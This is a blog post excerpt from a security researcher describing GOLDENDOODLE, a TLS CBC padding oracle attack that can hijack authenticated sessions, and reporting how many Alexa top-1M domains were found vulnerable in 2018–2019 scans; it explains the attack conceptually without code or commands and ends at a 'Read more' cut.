This post is one in a series of posts describing TLS CBC padding oracles I have identified on popular web sites. The other posts in this series include an overview of CBC padding oracles, a walkthrough of how I came to develop a new CBC padding oracle scanner, and a write-up on the Zombie POODLE attack.

GOLDENDOODLE is the name I’ve given for exploiting modern TLS stacks using the classic CBC padding oracle technique described by Serge Vaudenay in 2002. GOLDENDOODLE can be used to hijack authenticated TLS sessions if the server reveals the padding validity of application data records in such a way that a MiTM attacker can recognize well-formed padding independently form a valid Message Authentication Code (MAC). This includes, but is not limited to, cases such as Cisco ASA CVE-2015-4458 where systems completely fail to validate MAC.

From a practical standpoint, the difference between GOLDENDOODLE and Zombie POODLE or POODLE TLS is performance.

As noted in a separate blog detailing how I came to research this topic and identify this behavior, GOLDENDOODLE attacks can be achieved with far fewer requests because the attacker has more control to manipulate the ciphertext without breaking the oracle response. GOLDENDOODLE oracles allow the attacker to confirm guessed values for plaintext bytes rather than waiting for random occurrences. In this post, I will detail the specifics of GOLDENDOODLE as observed during my scans of the Alexa top ranked sites.

Prevalence

My most recent scans for GOLDENDOODLE (March 2019) identified exactly 750 vulnerable domains with 57 different distinct behaviors out of the Alexa top 1M. This is down only slightly from initial scans in August 2018 which identified closer to 1,000 domains. This drop indicates that some number of sites did in fact deploy updates or configuration changes perhaps in (Read more...)